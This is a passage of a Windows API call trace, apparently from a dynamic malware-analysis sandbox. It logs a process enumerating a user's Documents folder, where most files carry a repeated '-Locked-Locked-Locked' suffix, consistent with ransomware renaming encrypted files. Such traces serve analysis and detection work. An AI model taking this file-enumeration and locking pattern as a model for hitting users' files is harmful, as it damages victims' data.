ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348dca5e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0305.436] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348eb419, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348eb419, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348eb419, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3493f76d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3493f76d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3493f76d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0305.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349592f2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349592f2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349592f2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0305.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496f171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3496f171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3496f171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0305.437] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34988bfa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34988bfa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34988bfa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked-Locked-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0305.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349ad67f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349ad67f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349ad67f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked-Locked-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0305.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0305.438] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349c349d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349c349d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349c349d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0305.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349d5a68, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349d5a68, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349d5a68, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", cAlternateFileName="JYYUHN~2.OTS")) returned 1 [0305.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0305.439] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0305.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0305.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349e6b0e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349e6b0e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349e6b0e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0305.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a387d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a387d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a387d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked-Locked-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0305.440] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0305.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a4ac94, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a4ac94, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a4ac94, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0305.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0305.441] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a5be70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a5be70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a5be70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0305.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a76bb8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a76bb8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a76bb8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked-Locked-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0305.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a87deb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34a87deb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34a87deb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked-Locked-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0305.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34add4ca, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34add4ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34add4ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0305.442] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.442] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.443] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0305.443] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0305.463] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34ae49d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ae49d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.464] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34ae49d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ae49d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.465] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3483cb73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3483cb73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3483cb73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx-Locked-Locked-Locked", cAlternateFileName="1FEG~2.XLS")) returned 1 [0305.465] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3484b4e7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3484b4e7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3484b4e7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx-Locked-Locked-Locked", cAlternateFileName="2XKT2-~2.PPT")) returned 1 [0305.465] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3485b34a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3485b34a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3485b34a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx-Locked-Locked-Locked", cAlternateFileName="4YEBKI~2.XLS")) returned 1 [0305.466] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34869e2c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34869e2c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34869e2c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf-Locked-Locked-Locked", cAlternateFileName="4GH0Y9~1.PDF")) returned 1 [0305.533] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34879b1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34879b1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34879b1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx-Locked-Locked-Locked", cAlternateFileName="88Z1O5~2.DOC")) returned 1 [0305.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34898402, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34898402, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34898402, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", cAlternateFileName="9WUI5E~2.DOC")) returned 1 [0305.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348abc94, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348abc94, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348abc94, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx-Locked-Locked-Locked", cAlternateFileName="AWNRFZ~2.PPT")) returned 1 [0305.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348ba65f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348ba65f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348ba65f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf-Locked-Locked-Locked", cAlternateFileName="AZYKAG~2.RTF")) returned 1 [0305.534] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348ccb5f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348ccb5f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348ccb5f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx-Locked-Locked-Locked", cAlternateFileName="BFC~2.DOC")) returned 1 [0305.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348dca5e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348dca5e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348dca5e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx-Locked-Locked-Locked", cAlternateFileName="CERXR1~2.XLS")) returned 1 [0305.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348eb419, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x348eb419, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x348eb419, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.535] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3493f76d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3493f76d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3493f76d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", cAlternateFileName="EUNC2M~2.XLS")) returned 1 [0305.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349592f2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349592f2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349592f2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", cAlternateFileName="FQNOQA~2.XLS")) returned 1 [0305.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496f171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3496f171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3496f171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", cAlternateFileName="FUKBCY~2.PPT")) returned 1 [0305.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34988bfa, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34988bfa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34988bfa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HBfGjDyK.doc-Locked-Locked-Locked", cAlternateFileName="HBFGJD~1.DOC")) returned 1 [0305.536] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349ad67f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349ad67f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349ad67f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUM 71h6W.pdf-Locked-Locked-Locked", cAlternateFileName="HUM71H~2.PDF")) returned 1 [0305.537] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i3bdpGM-nK_y", cAlternateFileName="I3BDPG~1")) returned 1 [0305.537] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349c349d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349c349d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349c349d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", cAlternateFileName="JOED-0~2.PPT")) returned 1 [0305.537] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349d5a68, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x349d5a68, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x349d5a68, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 